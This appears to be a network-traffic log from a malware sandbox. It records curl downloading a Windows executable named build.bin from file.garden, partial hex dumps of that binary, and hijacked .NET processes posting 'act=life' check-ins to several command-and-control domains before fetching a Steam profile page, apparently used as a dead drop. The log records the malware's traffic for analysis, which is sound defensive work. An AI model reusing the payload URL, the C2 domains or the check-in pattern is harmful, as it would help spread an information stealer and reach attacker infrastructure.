2024-09-30 16:20:19 UTC	16384	IN	Data Raw: 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 76 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f Data Ascii: ss': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="navigation" id="global_actio
2024-09-30 16:20:19 UTC	3768	IN	Data Raw: 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 49 6e 69 74 50 72 6f 66 69 6c 65 53 75 6d 6d 61 72 79 28 20 67 5f 72 67 50 72 6f 66 69 6c 65 44 61 74 61 5b 27 73 75 6d 6d 61 72 79 27 5d 20 29 3b 20 7d 20 29 3b 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 63 6f 6e 74 65 6e 74 20 22 3e 0d 0a Data Ascii: eLink">View more info</span></div><script type="text/javascript"> $J( function() { InitProfileSummary( g_rgProfileData['summary'] ); } ); </script></div></div></div></div></div><div class="profile_content ">
2024-09-30 16:20:19 UTC	12	IN	Data Raw: 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e Data Ascii: dy></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.10	49718	188.114.97.3	443	8132	C:\Windows\System32\curl.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 16:20:18 UTC	101	OUT	GET /ZmE_ziOgiFXI9Y48/build.bin HTTP/1.1 Host: file.garden User-Agent: curl/7.83.1 Accept: /
2024-09-30 16:20:18 UTC	812	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 16:20:18 GMT Content-Type: application/octet-stream Content-Length: 351232 Connection: close x-powered-by: Express access-control-allow-origin: * content-security-policy: default-src file.garden linkh.at data: mediastream: blob: 'unsafe-inline' 'unsafe-eval' last-modified: Mon, 30 Sep 2024 14:04:07 GMT Cache-Control: max-age=14400 CF-Cache-Status: HIT Age: 8135 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kkCrqO3Wy%2FbgTPM4y7Ok0L5lpDdHVVr4YKr4fvgmkz11Z7sqxyiVQIVvoxvJQ7knqkAf%2Bc32ltbCMbS3%2BRFnPqiHRQ6pon4nRtQm30FU4TvdlSg4e4vuO63U9g1j5g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cb58a225f930fa3-EWR
2024-09-30 16:20:18 UTC	557	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 a9 af fa 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 9a 00 00 00 be 04 00 00 00 00 00 0a c0 05 00 00 e0 04 00 00 20 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 05 00 00 04 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELf @ @
2024-09-30 16:20:18 UTC	1369	IN	Data Raw: 5a 05 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: Z `
2024-09-30 16:20:18 UTC	1369	IN	Data Raw: 2a d1 09 32 21 5f 4a df 8f 70 92 62 8e b4 55 ac 0e ab 10 20 06 9d 02 67 96 15 a0 a2 3d f1 d2 fd 59 ae c3 56 b8 82 d6 cf 89 cb 86 55 8d 60 79 a4 23 a4 8c 59 a2 d4 cd 21 b7 4a 34 52 78 d2 5a ce 5f ca 95 3f da 92 7e 62 d3 8d 98 b3 32 94 ac f3 ca 45 9f b8 63 42 6b 84 0e 94 c9 21 38 39 43 e5 0a 5d 4d d0 c6 cc 95 7b b7 88 60 29 05 83 9d 13 5e bb 2b 4f be 6a 8b 42 ef 94 8d d0 2e 52 67 f8 b4 a7 34 2b 6a d6 40 d8 a6 f7 7e 89 18 c4 49 ff 2f 32 ad 94 8e 54 7f 43 ff 10 63 31 3c 48 39 d0 2a 6e 89 ac 81 c8 5f 57 d2 4e ca be d1 2d 91 03 33 7d b7 d8 fd 6f 55 a1 4a 33 d6 fd be d0 bd e3 3b 27 c8 b4 81 e0 c0 e7 ba 83 bd 19 ca f0 73 8a f0 00 33 0e 3d a8 3c 80 8a ea 14 18 bd 2a aa 0b b7 f2 29 83 e1 55 98 ff d5 ac 8d 80 52 3f cc 1a db 8b 25 e8 74 ad ad 92 49 9a d1 f4 6a b0 24 Data Ascii: 2!_JpbU g=YVU`y#Y!J4RxZ_?~b2EcBk!89C]M{`)^+OjB.Rg4+j@~I/2TCc1<H9n_WN-3}oUJ3;'s3=<*)UR?%tIj$
2024-09-30 16:20:18 UTC	1369	IN	Data Raw: c4 63 2f f6 af b7 d6 df 2e 9e 90 e0 c0 27 0e c0 85 68 d1 d7 b6 d1 64 b9 cc 3e 1f 54 a9 64 f8 33 01 ee 13 85 bc e6 f9 b2 42 16 f0 39 ae 5e 29 b8 1d 81 31 f5 cc 40 e6 50 2b 80 1e f5 0f 0c ce 0c 54 56 06 c2 f5 5b 79 09 2c 4d 92 ac 2e f0 12 f7 f7 72 a3 83 0b 79 e4 40 32 3e bb 67 7d 88 21 fc f3 d3 ab 9c f2 44 e3 39 dd 15 5a 3c 38 21 08 7b fd 8a 47 20 1d f3 5d 75 05 ce f8 02 9c c5 f4 54 58 b2 0e fd 5e e9 c7 80 c8 77 31 fd 69 ae ab 8b c8 36 19 19 b4 e3 4d 0a dc 33 9f 96 49 22 93 44 27 71 0e 44 4c c7 fd d5 69 33 ed fc 3f 82 97 65 34 25 ee 12 ce fc 69 cb 20 42 2e ec d1 87 6d 65 fa df 86 9a 8b 67 12 9f 27 4d ff 34 e3 44 5c a8 f9 dd 07 ca 07 62 02 3d a4 fd 5e 1f ba ed 3f 57 23 36 72 09 57 4e e5 dc 32 2a 1d 1b b5 1d eb 72 1c a4 42 11 d1 18 88 d3 78 06 fb c9 bc 95 54 Data Ascii: c/.'hd>Td3B9^)1@P+TV[y,M.ry@2>g}!D9Z<8!{G ]uTX^w1i6M3I"D'qDLi3?e4%i B.meg'M4D\b=^?W#6rWN2*rBxT
2024-09-30 16:20:18 UTC	1369	IN	Data Raw: e8 fc e3 ad bf e1 4f ed b8 ef ca a2 41 b9 d6 42 cf 04 88 2e 36 03 6e 0d 60 1f 6d 32 6e 58 83 38 3d 19 39 8a d6 ff eb dd 04 9f 67 4f f4 00 f3 b0 08 5f ff 07 4d 66 5e 0f 83 c9 89 d8 31 5d 3a 96 85 f1 6b 8d 99 46 c7 67 af 63 e9 dd 2d c9 aa bc df 14 03 1f 7c 38 71 c7 18 09 59 64 fa 86 f3 e6 44 d9 b0 41 47 cf 54 23 a1 d6 3a b7 e3 a9 d8 94 31 1c 80 9e c3 8a e8 8e 6e bc 99 7f ac c5 a7 81 bd bf 4c d4 19 68 56 d5 34 5a 93 64 85 bf 45 de 53 ad e1 89 5b 4b 7c fe 41 f4 14 3b c7 86 19 c8 0d 2f 26 59 47 b0 67 67 2b d5 94 b3 9a ff 52 28 1a 89 05 b5 09 16 f3 0c 2c 9c 01 20 b7 0f 6b e6 d8 73 e1 17 e6 2d 72 86 f3 a0 dd f6 c0 cc 84 d6 32 74 d4 4f 6f 17 d1 5f 5d 4d cf b4 3a 85 84 4b 49 75 2f bf c2 ec 5a 36 6d 66 6a 93 e9 7b e3 e1 e2 a7 d1 9c a3 e6 fc 41 19 ff e2 06 aa f2 77 Data Ascii: OAB.6n`m2nX8=9gO_Mf^1]:kFgc-\|8qYdDAGT#:1nLhV4ZdES[K\|A;/&YGgg+R(, ks-r2tOo_]M:KIu/Z6mfj{Aw
2024-09-30 16:20:18 UTC	1369	IN	Data Raw: ec 06 9e bc 86 8f 18 6c e3 09 5b 14 1a b5 29 f9 ca 5a 0a 4d 8b ef 78 e8 03 a5 06 5e f4 6b a4 f3 08 e4 4b 9c bb 48 35 2d b0 b0 db 74 af 82 3f 06 c3 d0 ad 24 27 01 1e dc bc ea 9e 41 f4 0b 5a ff fd a7 06 a0 45 f9 87 7a 5b 57 5f 1b 7a b5 c1 22 37 1f c5 6f bf 7a c4 de 03 db 8e 33 a0 55 a1 d3 ec 94 b4 3b 72 1f be 9a 21 51 a2 e6 7e e7 ba 63 4e 1d af 9f 22 5c af ba 05 ee ed 91 85 70 05 ae 91 78 c0 ab 08 8a e8 b9 b5 cd 74 7a b5 ed ed e4 6e 40 22 42 f1 b0 3c cb 21 91 39 1d 00 72 df 18 7d 88 94 a5 3a 7e 0c 31 cf cf 64 65 a8 b4 4a 83 23 cb c7 2b a0 6b de ff cb 90 a4 b0 8e 46 b7 e4 3a 75 21 6b e4 df eb f1 32 99 67 95 78 4f ba 73 b8 78 ac 07 c2 1c e3 5f 7c 90 68 09 81 a3 01 77 14 b8 23 35 7a c9 26 7a 1c 57 ef b4 6a e3 dd 40 7d 4b 6e ca 80 28 e8 44 9e 4b dc 22 8b c4 25 Data Ascii: l[)ZMx^kKH5-t?$'AZEz[W_z"7oz3U;r!Q~cN"\pxtzn@"B<!9r}:~1deJ#+kF:u!k2gxOsx_\|hw#5z&zWj@}Kn(DK"%
2024-09-30 16:20:18 UTC	1369	IN	Data Raw: fd b2 46 cd 99 ef e2 a5 b0 59 8a af cd ff 30 1b 38 6d d1 75 19 74 92 59 bb aa 3b f8 f8 ea b5 19 04 71 23 ab 0c 31 da 23 13 d8 73 fc f8 7d c4 17 b2 2a e8 2e 30 bc 6f f3 5a 2e 8c 54 f2 b6 24 bc ef 2e 0c 49 4b 3d e1 17 f6 24 c1 6b 03 03 8a e0 90 d0 48 70 88 e4 94 16 c2 a9 a4 c9 9a 5b fa f3 21 10 57 93 f4 60 23 61 9e ef bd 03 ab d0 74 78 55 aa b8 db 2f 67 85 e3 6b 20 06 a8 ab 08 ee 3b 06 06 92 37 82 da 99 54 77 58 a9 4e 72 12 50 1f 68 78 50 08 e5 2d 28 f5 79 62 d0 63 4e 76 c0 9c ca 93 bb 76 46 20 e1 88 96 d4 b1 5f a0 59 3b 77 aa 0e 29 72 02 1b 5c ff 3b 52 85 19 3b aa 97 60 11 9e fb c0 85 3e ec 6d bf a4 31 e4 f9 e8 b8 71 6d 15 31 57 65 9a 30 0f 99 eb 22 18 60 66 33 bb 06 12 33 cb 62 50 ac 0e 16 6c 60 2a a8 5f d2 39 58 ee 26 3b 90 c9 fb 5d 0c f0 b8 77 27 09 9b Data Ascii: FY08mutY;q#1#s}.0oZ.T$.IK=$kHp[!W`#atxU/gk ;7TwXNrPhxP-(ybcNvvF _Y;w)r\;R;`>m1qm1We0"`f33bPl`_9X&;]w'
2024-09-30 16:20:18 UTC	1369	IN	Data Raw: ac 80 75 f8 16 db f8 71 77 a9 b4 de 8b 8e 82 54 49 2e 01 be 29 c7 d8 4e 55 8d a9 97 b9 36 a5 ab 4d 34 a1 55 d2 0b 40 1d 8a d0 95 1b 90 78 c7 5c e8 58 4f a8 9c 49 8e da 2d 04 f3 cb 32 69 79 75 c3 2a a8 f4 36 79 b1 db 3d a1 ee 55 3a 0f d0 ff 5d d6 e6 02 4c f2 10 64 20 95 94 e0 10 c1 e8 c2 52 a6 89 bd 01 dc 14 b3 f6 2d 78 c1 31 9e 4e 91 d6 db 2d 39 31 5b 14 da f4 f1 7c fc 4e 59 c0 80 38 76 23 09 bc 67 b8 57 f4 20 e3 d8 2b 19 22 b9 b5 ac d5 e1 39 98 a9 cb 6b 79 66 de cf 4f 97 46 27 6e 7f e7 88 65 81 cf aa a2 aa 52 de 25 ca 83 54 15 07 39 5c b3 7b ac 3f 82 f2 4b de c7 b0 88 9c c8 7a fe fb 40 d9 50 f4 2e 1d 33 15 01 b8 5f ac 63 47 6c 19 c9 7d 0f f4 92 92 42 16 38 7f 44 d9 cb 45 da c6 9b 36 42 c5 1b ae b2 fb d6 dd dc a7 f1 de 12 a3 79 45 3f 26 38 ca bc ff ef 41 Data Ascii: uqwTI.)NU6M4U@x\XOI-2iyu*6y=U:]Ld R-x1N-91[\|NY8v#gW +"9kyfOF'neR%T9\{?Kz@P.3_cGl}B8DE6ByE?&8A
2024-09-30 16:20:18 UTC	1369	IN	Data Raw: 08 bf f5 2f 45 51 84 24 b3 db d0 97 44 9c 47 38 2a 7b 45 63 90 62 a1 d1 da 56 a8 3f 0f 39 19 02 53 9c d6 2a 5f 96 83 c7 47 ce f8 2f c6 18 fa 0a 97 32 e8 88 d2 d5 f0 ec d1 6d e1 0c 9c dd 7e 1a ed a8 26 a9 fc d2 ec fe c6 80 8f 3f dd c0 2c 6b ef 73 dd cf a1 71 1e 96 7d 4c 10 7a 97 54 01 79 92 43 01 43 9e 06 ca fb 98 0f 03 cb 96 a9 e0 1f 8c 93 4b 05 41 01 30 3d b0 1f ee 19 28 ff 66 b3 03 ff d7 17 a6 85 a0 78 01 50 92 12 4e 64 87 81 19 1a 8e fc 6b 79 c7 25 73 3a cc 67 29 aa af 00 60 e7 9c 56 98 8d 56 ba cf 61 0f a4 74 f5 9f 0d 70 55 be ad 23 00 28 5f 5a 37 07 91 a3 7a 76 a2 0d 24 76 e6 ff 9e cc cf 45 30 9d 71 e9 d6 54 eb d1 0b b1 d6 b1 f7 1f b4 7d ef af ca 05 82 91 29 75 4e 5b a0 91 b7 6b c8 b5 19 17 e7 6e db 91 8e 8d e7 9a d7 e8 f1 53 b0 b5 bf 47 c8 6c 10 de Data Ascii: /EQ$DG8{EcbV?9S_G/2m~&?,ksq}LzTyCCKA0=(fxPNdky%s:g)`VVatpU#(_Z7zv$vE0qT})uN[knSGl
2024-09-30 16:20:18 UTC	1369	IN	Data Raw: af 8e f5 64 a0 f2 f3 2e e8 06 9b 3f db 6b 92 d6 20 69 e9 15 71 e6 b4 61 bf 93 21 0f 67 7b b9 07 df 85 b6 46 fd 94 66 3a ba 39 34 30 c7 34 98 69 be 4d 56 4c ea a2 cc b7 28 f8 bd 53 9f d2 f1 49 4b b5 18 f6 91 a8 33 f6 13 02 1a e0 09 cc 2c f9 d3 22 de 0f f7 9b 82 06 2f fa 1c c6 00 49 8f 05 9e 22 68 5e 9f 65 f7 e6 37 07 52 c5 41 45 d7 94 e2 b8 ff ba f9 31 08 59 f0 99 69 eb ba 8d af a1 c1 e0 1b dc 34 a9 aa 57 a7 9a 7a a8 c6 63 29 95 f1 a0 94 96 41 cb 10 b5 f8 d7 92 fe da 8b e1 84 f8 6b 22 b3 63 f8 d8 75 69 a4 bd c9 94 82 4d 11 89 c0 d5 e0 b5 cf de a9 42 ac 37 39 7b fc ea 96 f6 3c ae ad 00 92 79 11 6a 79 5c f2 94 07 f0 c2 cd c3 54 19 b3 89 ad 87 85 18 60 3d 61 2b ef 16 7a 5d 09 7d df 96 dd 69 35 53 e9 1d ee ab ac 68 ca d5 e3 63 9b 82 d3 74 64 4d e4 d7 6d 15 51 Data Ascii: d.?k iqa!g{Ff:9404iMVL(SIK3,"/I"h^e7RAE1Yi4Wzc)Ak"cuiMB79{<yjy\T`=a+z]}i5ShctdMmQ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.10	49719	172.67.197.40	443	8060	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 16:20:20 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: offeviablwke.site
2024-09-30 16:20:20 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-30 16:20:20 UTC	798	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 16:20:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=jp9cms2k0v2g73nhbgqv9n3b0v; expires=Fri, 24 Jan 2025 10:06:59 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iAHZRe0z7isa0Itc3mrvBepDWSZ8ehCX5ZthTFgHS83XOjdWZPXuihhHSJ5hN4WJbBIhfXibhpcOJvXPH21bY8PGfc3zutYlGMRAcIAqfYGBg6bzB5oCfrPfVOtRywWaf7HbRw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cb58a2aebaf8c90-EWR alt-svc: h3=":443"; ma=86400
2024-09-30 16:20:20 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-30 16:20:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.10	49726	188.114.96.3	443	3768	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 16:20:24 UTC	267	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: explorationmsn.store
2024-09-30 16:20:24 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-30 16:20:24 UTC	806	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 16:20:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=qkaro3r9htvtocgr2brsdgnlvk; expires=Fri, 24 Jan 2025 10:07:03 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VvqE48hOQPIabeeku4%2FjnR7lKFiLzgJgbi0SMDusZLOYzXqD5BaC4i2uM9fhCC0f3Jmvj%2FhkH3p8oSHgvaual3R1zIbIGHzJsUvXXaJFWU7aYw75vklGsMxucwqHW3hfeHTnzSHHIw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cb58a433f6478e7-EWR alt-svc: h3=":443"; ma=86400
2024-09-30 16:20:24 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-30 16:20:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.10	49728	104.21.1.169	443	3768	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 16:20:25 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: underlinemdsj.site
2024-09-30 16:20:25 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-30 16:20:25 UTC	780	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 16:20:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=emtsackfrsdgp8ktmieugtu1mh; expires=Fri, 24 Jan 2025 10:07:04 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wc7nvj7dRhDLFX7MGBPdiS45mWXQ6reP%2BIYuyq1AXUu%2FsJG9wLkuu%2Fbb7eFJzU%2BssDhEfkKggHxn%2Fqyx081XAWlm%2BkmAfxjYyTIX6fdTMx2WYe97%2F6crH7oUHpqoCjJyyMwY7NY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cb58a4bdfa24269-EWR
2024-09-30 16:20:25 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-30 16:20:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.10	49732	104.102.49.254	443	3768	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 16:20:27 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2024-09-30 16:20:27 UTC	1870	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Mon, 30 Sep 2024 16:20:27 GMT Content-Length: 34678 Connection: close Set-Cookie: sessionid=db1d43d614fdfcd029bd4655; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-09-30 16:20:27 UTC	14514	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-09-30 16:20:27 UTC	16384	IN	Data Raw: 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 76 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f Data Ascii: ss': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="navigation" id="global_actio
